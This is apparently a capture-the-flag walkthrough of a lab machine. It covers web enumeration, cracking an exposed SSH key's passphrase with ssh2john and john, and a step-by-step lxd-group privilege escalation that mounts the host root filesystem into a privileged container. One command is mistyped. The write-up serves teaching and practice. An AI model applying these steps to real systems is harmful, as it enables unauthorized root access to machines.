Gaming Server

Gaming Server

rustscan

Not to much to go on. Let's have a look at the website.

After looking around and clicking there wasn't much to go on. However looking at the page source we find a name!

But, I'm not convinced that's all we need just yet. Let's run a feroxbuster and see if we can find something.

Nice! Uploads and Secret. Let's have a look

Let's take a look at secret first.

SecretKey looks promising

We got a ssh key. That can't be a bad thing. Before we try ssh'ing in let's check out uploads also.

manifesto.txt gives us a little clip of the actual hacker manifesto

Then a meme for meme.jpg lol. We can come back and check that if we need to. Not going to waste time on it unless we get stuck.

Let's check out the more interesting file in Uploads, dict.lst

And now we have what looks like a password list we can use.

Alright let's try to put all this together and see what happens. We have a name, a password list and an ssh key. We should be good now.....hopefully

Let's grab that dict.lst first

Okay so when we try to login with john and the ssh key we found it ask's us for a password.

So, let's run ssh2john on our ssh key and see if we can then use john to crack the password.

Once we have a hash for john to crack we can then use the following command to crack the hash

john hash

I just tried with john's standard dictionary and it cracked it very quickly. But it also worked with the supplied dict also.

Now we should be able to login via ssh with johns creds.

And we are in!

We can now print out the user.txt easily

Now let's get root!

After looking around for a while and running linpeas it looks like the best path to take is an lxc/lxd priv esc method.

We're going to follow the exploit from HackTricks step by step to hopefully get root.

Step 1. on our attack machine.

Install Requirements

sudo apt update

sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools

Clone Repo

git clone https://github.com/lxc/distrobuilder

Make Distrobuilder

cd distrobuilder

make

Prepare the creation of alpine

mkdir -p $HOME/ContainerImages/alpine/

cd $HOME/ContainerImages/alpine/

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

Create the Container

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

Start a python3 server to serve up the created files

python3 -m http.server 80

Step 2. on our target machine

Upload the vulnerable server files to the target machine

Add the Image

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

View the new image

lxc image list

Create a Container and add root path

lxc init alpine privesc -c security.privileged=true --alias=alpine
💡
I had to remove the --alias=alpine to make this work.

Let's make sure it worked

lxc list

looking good!

Let's add the root path now

xc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
💡
If you find this error Error: No storage pool found. Please create a new storage pool

Let's Execute the Container

lxc start privesc

lxc exec privesc /bin/sh

Now, let's run ID and WHOAMI

WE ARE ROOT!

We are in a mounted container so we have to do a little weird navigation here but nothing to bad.

cd /mnt/root/root

And we have our root flag!